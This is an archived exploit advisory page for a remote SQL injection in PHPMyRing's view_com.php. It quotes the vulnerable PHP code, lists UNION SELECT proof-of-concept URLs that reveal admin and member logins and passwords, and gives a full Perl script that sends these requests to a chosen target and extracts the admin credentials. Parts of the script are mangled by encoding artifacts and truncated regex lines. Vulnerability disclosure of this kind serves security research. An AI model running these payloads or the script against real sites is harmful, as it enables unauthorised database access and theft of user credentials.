Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: b06-4144.htm

PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection



PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection
PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection



#######################################################################=0D
# =0D
# PHPMyRing's (view_com.php) Remote SQL injection Exploit=0D
# =0D
# vulnerable code on view_com.php line ( 14 - 24)=0D
# =0D
# [code]=0D
# -----------------------------------------------------------------------------------=0D
# if (!$idsite)=0D
#    {=0D
#    echo "

"._("Erreur! Le n° du site n'est pas défini!")."

";=0D # }=0D # else=0D # {=0D # // On va aller chercher le nom du site consern=E9, =E7a sera fait ;)=0D # // Connexion MySQL=0D # $conn=connecte();=0D # $row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite")); # <== SQL injection=0D # $site_nom=$row['site_nom'];=0D # =0D # ...............=0D # =0D # =0D # xmlns="http://www.w3.org/1999/xhtml" xml:lang="">=0D # =0D # <? echo _("Commentaires du site"). " ".$site_nom; ?> =0D # ---------------------------------------------------------------------------------[/code]=0D # =0D # $idsite is not proprelly verified and can be used to inject sql some query=0D # =0D #============0D # Exploit :=0D #============0D # =0D # http://localhost/webring/view_com.php?idsite=[SQL]=0D # =0D #============0D # Exemples : =0D #============0D # =0D # [+] the first PoC URL will display admin username in page title and the second admin password=0D # =0D # http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm=0D # =0D # http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm=0D # =0D # =0D # [+] this will display members username (1) and password(2) in page title=0D # =0D # 1) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20pseudo%20FROM%20webring%20WHERE%20idsite=[victimesiteid]=0D # =0D # 2) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20mdp%20FROM%20webring%20WHERE%20idsite=[victimesiteid]=0D # =0D # Exploit to extract both admin login and plain text password:=0D #=0D # C:\>perl ring.pl 127.0.0.1 webring=0D # #################################################=0D # # PHPMyRing's Remote SQL injection Exploit #=0D # # Discovered by simo64_at_morx_org #=0D # # Script writting by simo_at_morx_org #=0D # # MorX Security Research Team #=0D # # www.morx.org #=0D # #################################################=0D =0D # [*] Trying to get the admin login ...=0D =0D # [+] your admin login is --> admin=0D =0D # [+] your admin pass is --> 123456=0D =0D use IO::Socket;=0D =0D if(!defined($ARGV[0] && $ARGV[1])) {=0D =0D system (clear);=0D print "\n";=0D print "#################################################\n";=0D print "# PHPMyRing's Remote SQL injection Exploit #\n";=0D print "# Discovered by simo64_at_morx_org #\n";=0D print "# Script writting by simo_at_morx_org #\n";=0D print "# MorX Security Research Team #\n";=0D print "# www.morx.org #\n";=0D print "#################################################\n\n";=0D =0D print "--- Usage: perl $0 \n";=0D print "--- Example: perl $0 127.0.0.1 afd_webring\n\n";=0D exit; }=0D =0D $TARGET = $ARGV[0];=0D =0D $FOLDER = $ARGV[1];=0D =0D $PORT = "80";=0D =0D $SCRIPT = "/view_com.php?idsite=";=0D =0D $SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";=0D =0D $SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";=0D =0D ################################################################################=0D =0D $COMMAND1 = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1";=0D $COMMAND2 = "Host: $TARGET";=0D $COMMAND3 = "Connection: Close";=0D $COMMAND4 = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1";=0D =0D $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")=0D || die "Can't connect to $TARGET";=0D =0D print "#################################################\n";=0D print "# PHPMyRing's Remote SQL injection Exploit #\n";=0D print "# Discovered by simo64_at_morx_org #\n";=0D print "# Script writting by simo_at_morx_org #\n";=0D print "# MorX Security Research Team #\n";=0D print "# www.morx.org #\n";=0D print "#################################################\n\n";=0D =0D sleep 2;=0D =0D print "[*] Trying to get the admin login ...\n\n";=0D =0D print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";=0D =0D while ($result = <$remote> ) {=0D =0D if ($result =~ /site (.*?) $adminlogin\n\n";=0D $a = 1;=0D }=0D }=0D =0D if ($a == 0) =0D { =0D print "[-] Failed, cant get the admin login\n\n";=0D print "[*] Trying to get the admin password ...\n\n";=0D }=0D =0D $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")=0D || die "Can't connect to $TARGET";=0D =0D print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n";=0D =0D while ($result2 = <$remote> ) {=0D =0D if ($result2 =~ /site (.*?) $adminpass\n\n";=0D $b = 1;=0D }=0D }=0D =0D if ($b == 0)=0D { print "[-] Failed, cant get the admin password\n";=0D }=0D =0D $remote->flush();=0D close($remote);=0D exit;


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH